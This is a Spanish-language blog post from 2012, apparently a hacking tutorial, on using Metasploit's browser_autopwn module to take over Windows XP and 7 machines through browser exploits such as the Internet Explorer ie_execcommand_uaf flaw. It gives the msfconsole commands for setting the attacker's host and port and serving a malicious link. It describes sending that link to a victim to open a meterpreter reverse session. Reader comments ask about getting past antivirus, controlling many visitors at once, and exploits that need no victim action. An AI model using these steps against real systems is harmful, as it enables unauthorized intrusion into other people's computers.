domingo, 28 de octubre de 2012

Vulnerando Windows 7-XP (IE 0-day) usando Browser Autopwn desde Metasploit



En esta pequeña entrada se describirá como utilizar el modulo browser_autopwn incluida en el Metasploit, la cual nos permitirá explotar cualquier tipo de vulnerabilidad que afecten a los navegadores webs, obteniendo asi una session meterpreter en el sistema vulnerable.

Metasploit ofrece la posibilidad de lanzar exploits de acuerdo a la versión del browser que la victima este utilizando, por ejemplo cuando utilizemos el modulo browser_autopwn esta buscara todos los exploits respectivos para cualquier tipo de navegador, ya sea Internet Explorer, Google Chorme, Firefox u Opera, de manera que cuando la victima ejecute el link generado, esta automaticamente se aproveche de la vulnerabilidad encontrada.

Por otro lado, para acceder a cualquier Sistema Windows 7 o XP nos basaremos en la ultima vulnerabilidad 0-day que se registro en el Navegador Internet Explorer versiones 7 - 8 y 9 la cual permite que cualquier 'atacante' puede utilizar el exploit respectivo para tomar acceso completo al sistema.


Veamos un poco mas detallado el trabajo que realiza el modulo browser_autopwn para apoderarse de una forma rápida y fácil de cualquier sistema Windows.


REQUERIMIENTOS:

Backtrack 5 R1 - R2 o R3 (Atacante)
Metasploit Framework (Atacante)
Windows XP - 7 (Victima)


PROCEDIMIENTO DEL ATAQUE:

Abrimos Metasploit (msfconsole) y ejecutamos los siguientes comandos:

------------------------------------------------------------------------------------------------------------------
use auxiliary/server/browser_autopwn (Usar el modulo browser_autopwn)
set lhost 192.168.1.17 (IP del Atacante) 
set srvhost 192.168.1.17 (IP del Atacante)
set uripath / (Path del link a enviar)
set srvport 80 (Puerto)
exploit
------------------------------------------------------------------------------------------------------------------



Después de ejecutar el comando exploit, browser_autopwn empezara a buscar todos los exploits que pueda afectar a cualquier Navegador Web, ya sea en las vulnerabilidades de Java, Flash Player, WinZip, Apple Quick Time y unos cuantos mas, siempre y cuando tengamos el MSF actualizado.



Luego que la herramienta termine de 'buscar' todos los exploits que afecten a los navegadores, esta mostrara cuantos exploits ha encontrado y generara un link la cual sera enviada a la victima, como se aprecia en la imagen siguiente:



Como se aprecia en la imagen, browser_autopwn encontró 39 exploits y genero una URL http://192.168.1.17:80/ la misma que sera enviada a la victima para que lo ejecute desde su navegador, de tal manera que esta URL pueda ejecutar cualquier exploit en forma silenciosa y generar la conexion inversa.

Para tal caso, he ejecutado dicha URL en un Sistema Windows XP con Internet Explorer 7, de tal forma que browser_autopwn pueda ejecutar el exploit respectivo para el Navegador, la cual si logra ejecutarse sin problema alguno, esta devolverá una session meterpreter, como se aprecia en la imagen siguiente:



Claramente se aprecia la forma en que trabaja browser_autopwn ya que la URL se ejecuto en un Navegador Internet Explorer, entonces esta inmediatamente ejecuto el ultimo exploit ie_execcommand_uaf de tal forma que el sistema quedo totalmente VULNERADO!

Seguidamente, podemos utilizar los comandos respectivos para mostrar la información total del sistema y algunos que otros comandos que se requiera dependiendo de lo que deseemos hacer en dicho sistema.



Como mencione lineas arriba, esto puede funcionar en cualquier Navegador Web y cualquier Sistema Operativo Windows, solo basta con tener nuestro MSF totalmente actualizado y estar al tanto de las ultimas vulnerabilidades que pueden afectar a los mismos!

VIDEO-DEMOSTRATIVO:


Saludos.

7 comentarios:

  1. Ehy Te falto el Video pero el Post esta Bueno ! ;)

    ResponderEliminar
  2. Si el PC victima tiene activado el antivirus no funciona ;)

    ResponderEliminar
  3. Que pasa si por ejemplo entra mucha gente en esa URL?puedo tener el control de todos o del primero que entro?
    Y si tiene el Firewall y antivirus activado puedo hacerlo igual?

    ResponderEliminar
  4. Hay algun exploit para windows 7, que no requiera participacion de la victima ?

    ResponderEliminar